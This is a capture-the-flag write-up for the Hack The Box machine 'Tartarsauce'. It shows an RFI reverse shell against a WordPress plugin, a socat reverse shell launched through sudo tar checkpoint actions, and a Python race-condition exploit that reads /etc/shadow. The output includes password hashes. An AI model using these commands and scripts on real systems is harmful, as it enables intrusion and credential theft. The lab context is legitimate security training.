Tags: hack the box, inotify, tar, python
This was a challenging box. It had a lot of places to get lost in the sauce (ba-dum tssss). I found myself crawling back out of rabbit holes more than once while working on Tartarsauce. The two authors, 3mrgnc3 & ihack4falafel, did an excellent job of putting together a box that felt like it was straight out of OSCP. Enumeration and avoiding time-sinks were the keys to success here.
As usual, we start off with a masscan followed by a targeted nmap.
masscan -e tun0 --ports U:0-65535,0-65535 --rate 700 -oL scan.10.10.10.88.all 10.10.10.88
#masscan
open tcp 80 10.10.10.88 1538755374
# end
nmap -sC -sV -oN nmap.scan -p 80 10.10.10.88
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
nmap returns a ton of juicy looking urls from robots.txt. Unfortunately, they were all rabbit holes.
The real entrypoint was easy to miss unless you’re used to iteratively running gobuster on each directory found, or you use a recursive directory enumeration tool.
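To make the recursion idea concrete, here is a toy sketch in Python using the requests library; the wordlist path, depth limit, and status handling are all illustrative assumptions, and real tools like gobuster (used below) do this properly.
#!/usr/bin/env python3
# Toy recursive directory brute-forcer -- illustrative sketch only.
# Assumes a local wordlist named common.txt and the target from above.
import requests

INTERESTING = {200, 204, 301, 302, 307, 403, 500}

def brute(base_url, words, depth=0, max_depth=3):
    if depth >= max_depth:
        return
    for word in words:
        url = f'{base_url}/{word}'
        try:
            resp = requests.get(url, allow_redirects=False, timeout=5)
        except requests.RequestException:
            continue
        if resp.status_code in INTERESTING:
            print(f'{url} (Status: {resp.status_code})')
            if resp.status_code == 301:  # recurse into likely directories
                brute(url, words, depth + 1, max_depth)

if __name__ == '__main__':
    with open('common.txt') as wordlist:
        words = [line.strip() for line in wordlist if line.strip()]
    brute('http://10.10.10.88', words)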
The first gobuster scan, showing /webservices (we also saw this in the nmap scan):
gobuster -u 10.10.10.88 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -t 20 -o "gobuster.10.10.10.88.out"
http://10.10.10.88/.htaccess (Status: 403)
http://10.10.10.88/.hta (Status: 403)
http://10.10.10.88/.htpasswd (Status: 403)
http://10.10.10.88/index.html (Status: 200)
http://10.10.10.88/robots.txt (Status: 200)
http://10.10.10.88/server-status (Status: 403)
http://10.10.10.88/webservices (Status: 301)
The second gobuster scan, on the /webservices directory:
http://10.10.10.88/webservices/.hta (Status: 403)
http://10.10.10.88/webservices/.htaccess (Status: 403)
http://10.10.10.88/webservices/.htpasswd (Status: 403)
http://10.10.10.88/webservices/wp (Status: 301)
The final gobuster scan, on the /webservices/wp directory. This is the one where we know we’re dealing with a WordPress install due to the directory structure (wp-content, wp-admin, etc…):
http://10.10.10.88/webservices/wp/.hta (Status: 403)
http://10.10.10.88/webservices/wp/.htaccess (Status: 403)
http://10.10.10.88/webservices/wp/.htpasswd (Status: 403)
http://10.10.10.88/webservices/wp/index.php (Status: 301)
http://10.10.10.88/webservices/wp/wp-admin (Status: 301)
http://10.10.10.88/webservices/wp/wp-content (Status: 301)
http://10.10.10.88/webservices/wp/wp-includes (Status: 301)
Knowing we’re dealing with a WordPress install, wpscan immediately jumps to mind, as it’s the standard WordPress scanning tool.
wpscan -ep --url http://10.10.10.88/webservices/wp
wpscan options used:
--enumerate | -e [option(s)]
option :
p plugins
-------------8<-------------
[!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/9109
Reference: http://seclists.org/fulldisclosure/2018/Jul/89
Reference: http://www.defensecode.com/advisories/DC-2018-05-008_WordPress_Gwolle_Guestbook_Plugin_Advisory.pdf
Reference: https://plugins.trac.wordpress.org/changeset/1888023/gwolle-gb
-------------8<-------------
If you dig a bit into this plugin, the specific XSS vulnerability referenced isn’t what’s interesting. The interesting piece is outlined in the readme.txt included with the plugin, specifically, the changelog.
== Changelog ==

= 2.3.10 =
* 2018-2-12
* Changed version from 1.5.3 to 2.3.10 to trick wpscan ;D

= 1.5.3 =
* 2015-10-01
* When email is disabled, save it anyway when user is logged in.
* Add nb_NO (thanks Bjørn Inge Vårvik).
* Update ru_RU.
Now that we know the real version is 1.5.3, the way forward becomes clear: WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion. According to the Exploit-DB entry, the abspath parameter is used in a PHP require() call that tries to include a remote file named wp-load.php. We can serve up our own version of that file for RCE.
We can use the php reverse shell hosted on pentestmonkey as our wp-load.php. We just need to modify two lines within the file to reflect our IP address and port, and change the name of the file to wp-load.php.
# Malicious wp-load.php
-------------8<-------------
$ip = '10.10.14.77'; // CHANGE THIS
$port = 12344; // CHANGE THIS
-------------8<-------------
Spin up a local web server on kali for the target to reach out to when searching for its wp-load.php. Also on kali, fire up a listener to catch the callback.
python3 -m http.server 80
-------------8<-------------
nc -nlvp 12344
The final step is to make the request using the vulnerable parameter.
http http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.77/
We serve up the php via python and receive our callback.
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.88 - - [05/Oct/2018 12:23:09] "GET /wp-load.php HTTP/1.0" 200 -
Ncat: Connection from 10.10.10.88:48860.
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
\o/ - access level: www-data
Basic enumeration steps showed that we are able to run the /bin/tar command as the user onuma without a password via sudo.
Matching Defaults entries for www-data on TartarSauce:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on TartarSauce:
(onuma) NOPASSWD: /bin/tar
We can elevate privileges with the tar command below, and grab a full tty shell while we’re at it, by using a socat callback as the argument to checkpoint-action.
Local on kali.
socat file:`tty`,echo=0,raw tcp4-listen:12323
On target.
sudo -u onuma /bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec='/tmp/socat_x86 tcp-connect:10.10.14.2:12323 exec:"bash -li",pty,stderr,setsid,sigint,sane'
tar options used:
--checkpoint
display progress messages every NUMBERth record (default 10)
--checkpoint-action=ACTION
execute ACTION on each checkpoint
-------------8<-------------
the exec action executes a given external command
During re-enumeration as onuma, we notice that there is an interesting systemd service running.
/lib/systemd/system/backuperer.service
════════════════════════════
[Install]
WantedBy=multi-user.target
[Unit]
Description=Backuperer
[Service]
ExecStart=/usr/sbin/backuperer
There is also an associated timer.
/etc/systemd/system/multi-user.target.wants/backuperer.timer
════════════════════════════
[Unit]
Description=Runs backuperer every 5 mins
[Timer]
# Time to wait after booting before we run first time
OnBootSec=5min
# Time between running each consecutive time
OnUnitActiveSec=5min
Unit=backuperer.service
These two items together run the script below every 5 minutes as the root user.
The key take-away from the script: there is a 30-second window between backing up /var/www/html and performing the integrity check with diff. We’ll use that window of time to get root-level read access to the filesystem.
#!/bin/bash

#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi
Quick analysis of the code:
Because we are onuma, we can alter the tarball created by the script. The contents of /var/www/html never change, but we can change the contents of the tarball. If any files are different between the two folders, the differences will be captured in the error log.
Steps to exploit the race condition introduced in the code above (a rough sketch of the swap step appears just below):
1. Wait for backuperer to drop its tarball in /var/tmp.
2. Extract the tarball and replace one or more of the extracted files with symlinks to root-owned files we want to read.
3. Re-pack the altered contents over the original tarball before the 30-second sleep expires.
4. Let backuperer extract our tarball and run its integrity check, causing diff to compare what the file should be with what our link points to.
5. Read the target file’s contents out of /var/backups/onuma_backup_error.txt.
Now that we have a way ahead, let’s put our analysis into action.
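To make the middle steps concrete, here is a rough sketch of the swap performed by hand as onuma during the 30-second sleep. The scratch directory, the target file, and the choice of robots.txt as the file to replace are illustrative assumptions; the actual automation lives in the script described next.
#!/usr/bin/env python3
# Rough sketch of the swap step, run as onuma during the script's 30-second
# sleep window.
import glob
import os
import tarfile

workdir = '/tmp/swap'       # scratch space we control (illustrative)
target = '/etc/shadow'      # root-owned file we want to read

# 1) find the in-progress backup: a hidden, sha1-named gzip in /var/tmp
#    (assumes the fresh backup is the only matching hidden entry)
tmpfile = glob.glob('/var/tmp/.??*')[0]

# 2) extract it, then swap one extracted file for a symlink to our target
os.makedirs(workdir, exist_ok=True)
with tarfile.open(tmpfile) as tar:
    tar.extractall(workdir)

victim = os.path.join(workdir, 'var/www/html/robots.txt')
os.remove(victim)
os.symlink(target, victim)

# 3) re-pack the altered tree over the original tmpfile; when backuperer
#    later extracts it and runs `diff -r`, the difference between the real
#    robots.txt and whatever our symlink points at (i.e. /etc/shadow) ends
#    up in /var/backups/onuma_backup_error.txt
with tarfile.open(tmpfile, 'w:gz') as tar:
    tar.add(os.path.join(workdir, 'var'), arcname='var')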
There are a lot of ways to determine when the tarball is alive and available for manipulation; pspy and a simple process watcher script come to mind, and both are much simpler solutions than what I outline below. I’ve been waiting for an excuse to play with inotify, and this was a perfect opportunity.
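For example, a crude (hypothetical) process watcher could just poll the process list until the backup job appears:
#!/usr/bin/env python3
# Crude process-watcher alternative: poll ps until backuperer shows up,
# at which point the tarball is being written.
import subprocess
import time

while True:
    ps = subprocess.run(['ps', '-eo', 'args'], capture_output=True, text=True)
    if '/usr/sbin/backuperer' in ps.stdout:
        print('[+] backuperer is running; tarball incoming')
        break
    time.sleep(1)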
I wanted to write a program that used inotify to trigger reactions when backuperer ran. pspy uses inotify under the hood as well, which is really what got me interested in playing with inotify in the first place. I chose to use pyinotify and Python instead of C.
The general steps to the script are what is laid out above. Additionally, I wanted to implement a few nice-to-haves as well.
As I previously mentioned, the key feature that I wanted to play with while writing this script was inotify. The pyinotify module makes handling events really simple.
The basic premise is that you create watches and add them to a watch list. Each item (“watch”) in the watch list specifies the pathname of a file or directory, along with some set of events that the kernel should monitor for the file referred to by that pathname.
When events occur for monitored files and directories, those events are made available to the application as structured data.
For my script, I set two watches detailed below.
The first watch used IN_CLOSE_WRITE on /var/tmp. The IN_CLOSE_WRITE event is triggered when a file that was opened for writing is closed.
The code below creates the WatchManager and adds a watch that handles events produced when a file within /var/tmp that was opened for writing is closed.
wm = pyinotify.WatchManager()
wm.add_watch('/var/tmp', pyinotify.IN_CLOSE_WRITE)
That done, we define an event handler and register a callback that will execute each time a file that was opened for writing is closed within /var/tmp. We use IN_CLOSE_WRITE because we want the entire tarball to be written before we do anything with it. pyinotify uses the naming convention process_EVENT_NAME within ProcessEvent subclasses (like the EventHandler below) to know which callback function to call when an event occurs.
class EventHandler(pyinotify.ProcessEvent):
def __init__(self, *args, **kwargs):
# -------------8<-------------
def process_IN_CLOSE_WRITE(self, event: pyinotify.Event) -> None:
# This function is designed to trigger on the creation of the tarball generated by /usr/sbin/backuperer
# -------------8<-------------
def process_IN_MODIFY(self, event: pyinotify.Event) -> None:
# This function is designed to trigger when /var/backups/onuma_backup_error.txt is appended to
# -------------8<-------------
handler = EventHandler(...)
notifier = pyinotify.Notifier(wm, handler)
notifier.loop()
The second watch used IN_MODIFY on /var/backups/onuma_backup_error.txt. The IN_MODIFY event is triggered when a file is modified.
The code below adds another watch to the WatchManager that handles events produced when the error log is modified, i.e. after the diff happens and output is appended to the error log.
wm.add_watch('/var/backups/onuma_backup_error.txt', pyinotify.IN_MODIFY) # for reading error_log
The additional watch works in concert with the EventHandler class above. With callbacks registered to watch for events triggered by the backuperer service, the next step is to package everything up and get it to target.
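Putting both watches and the handler together, a minimal, self-contained sketch of the pattern looks something like the following. This is not triggered.pyz itself; the real script’s callbacks perform the tarball manipulation described earlier, while this sketch only reports what it sees.
#!/usr/bin/env python3
# Minimal two-watch pyinotify sketch: one watch for the tarball, one for the
# error log. Callbacks here only print; triggered.pyz does the real work.
import pyinotify

ERROR_LOG = '/var/backups/onuma_backup_error.txt'


class EventHandler(pyinotify.ProcessEvent):
    def process_IN_CLOSE_WRITE(self, event):
        # fires when a file opened for writing is closed under /var/tmp,
        # i.e. when backuperer finishes writing its tarball
        print(f'[+] tarball ready: {event.pathname}')

    def process_IN_MODIFY(self, event):
        # fires when the error log is appended to, i.e. after the diff runs
        print(f'[+] error log updated: {event.pathname}')


wm = pyinotify.WatchManager()
wm.add_watch('/var/tmp', pyinotify.IN_CLOSE_WRITE)
wm.add_watch(ERROR_LOG, pyinotify.IN_MODIFY)

notifier = pyinotify.Notifier(wm, EventHandler())
notifier.loop()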
To deploy the script with its dependencies, I chose to use the zipapp module. This module provides tools to manage the creation of zip files containing Python code, which can be executed directly by the Python interpreter.
If you’ve never heard of or played with this module, it’s pretty baller. It isn’t a solution for all dependency problems, but for simple cases, it can be incredibly useful. To magic the script and pyinotify into a single executable zip, all that’s needed is the following:
pip install PACKAGE --target DIR
python3 -m zipapp DIR
You can try it out for yourself by using the commands below.
git clone https://github.com/epi052/htb-scripts-for-retired-boxes.git
cd htb-scripts-for-retired-boxes/tartarsauce
python3 -m pip install pyinotify --target triggered
python3 -m zipapp -p "/usr/bin/env python3" triggered
After running the commands above, you should have a triggered.pyz file sitting in your current working directory. If you run file on it, you can see it’s labeled as a zip archive.
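One detail zipapp relies on: when you don’t pass -m, it expects a __main__.py inside the target directory and uses it as the entry point. A minimal, hypothetical example of such a file is shown below; the real triggered/__main__.py in the repo is what actually implements the watches.
# triggered/__main__.py -- hypothetical minimal entry point; zipapp executes
# this file when the resulting .pyz archive is run.
import sys

import pyinotify  # bundled next to this file by `pip install --target`


def main(argv):
    print(f'[+] pyinotify loaded from inside the archive: {pyinotify.__file__}')
    print(f'[+] arguments passed to the .pyz: {argv}')
    return 0


if __name__ == '__main__':
    sys.exit(main(sys.argv[1:]))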
NOTE: I had to do the following on my kali box to get pip3
installed, YMMV
wget https://bootstrap.pypa.io/get-pip.py
python3.6 get-pip.py
For the sake of brevity, I didn’t include the entire script in this post; you can find it in the htb-scripts-for-retired-boxes repo linked above. I commented it well enough that it’s hopefully easy to follow. I plan to start including non-trivial HTB solution-related scripts in that repo (smasher comes to mind).
Here is a sample run of the script against a few files.
./triggered.pyz /var/tmp --to_read /root/root.txt /var/backups/gshadow.bak /var/backups/shadow.bak /var/backups/passwd.bak /var/backups/group.bak /etc/shadow /etc/gshadow
[+] Files to read:
[-] /root/root.txt
[-] /var/backups/gshadow.bak
[-] /var/backups/shadow.bak
[-] /var/backups/passwd.bak
[-] /var/backups/group.bak
[-] /etc/shadow
[-] /etc/gshadow
[+] Tarball created by /usr/sbin/backuperer
[-] /var/tmp/.44cc41ae53ccc6377078968afb1ac80741cf94a8
[+] Files from /var/tmp/.44cc41ae53ccc6377078968afb1ac80741cf94a8 extracted
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-mail.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-mail.php to /root/root.txt
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-links-opml.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-links-opml.php to /var/backups/gshadow.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-comments-post.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-comments-post.php to /var/backups/shadow.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/.htaccess
[-] Linking /tmp/var/www/html/webservices/wp/.htaccess to /var/backups/passwd.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-trackback.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-trackback.php to /var/backups/group.bak
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/xmlrpc.php
[-] Linking /tmp/var/www/html/webservices/wp/xmlrpc.php to /etc/shadow
[+] Found file to overwrite: /tmp/var/www/html/webservices/wp/wp-cron.php
[-] Linking /tmp/var/www/html/webservices/wp/wp-cron.php to /etc/gshadow
[-] All files to be read are linked.
[+] Tarring up the altered backup.
[-] Tarball /var/tmp/.44cc41ae53ccc6377078968afb1ac80741cf94a8 created.
[+] Error log modified, checking results.
[+] /var/backups/passwd.bak
root:x:0:0:root:/root:/bin/bash
-------------8<-------------
onuma:x:1000:1000:,,,:/home/onuma:/bin/bash
[+] /var/backups/shadow.bak
root:$6$AKRzYZby$Q88P1RTNm6Ho39GencM8qFL8hkhF0GmIhYAdxlIuHVv50BTTXvIH2rzgWOCkZOQDSuWo6gWQ2gXoePj8Rwthm0:17582:0:99999:7:::
-------------8<-------------
onuma:$6$P9azUgRM$U9lw7gpIvIVv1UK9zzzakd9mVwNeusjtWvYfHpS5qcMqLqoa9O3c1iARol1h7Aa8Tqroif.jtKxrLX5XOf/9c0:17571:0:99999:7:::
[+] /etc/gshadow
root:*::
-------------8<-------------
[+] /var/backups/gshadow.bak
root:*::
-------------8<-------------
[+] /root/root.txt
e79...
[+] /var/backups/group.bak
root:x:0:
-------------8<-------------
[+] /etc/shadow
root:$6$AKRzYZby$Q88P1RTNm6Ho39GencM8qFL8hkhF0GmIhYAdxlIuHVv50BTTXvIH2rzgWOCkZOQDSuWo6gWQ2gXoePj8Rwthm0:17582:0:99999:7:::
-------------8<-------------
onuma:$6$P9azUgRM$U9lw7gpIvIVv1UK9zzzakd9mVwNeusjtWvYfHpS5qcMqLqoa9O3c1iARol1h7Aa8Tqroif.jtKxrLX5XOf/9c0:17571:0:99999:7:::
As you can see, it can grab any root owned file, including root.txt. I had a lot of fun working on the box and finally squirreling out and writing the script to automate the root read access.
\o/ - root read access
I hope you enjoyed this write-up, or at least found something useful. Drop me a line on the HTB forums or in chat @ NetSec Focus.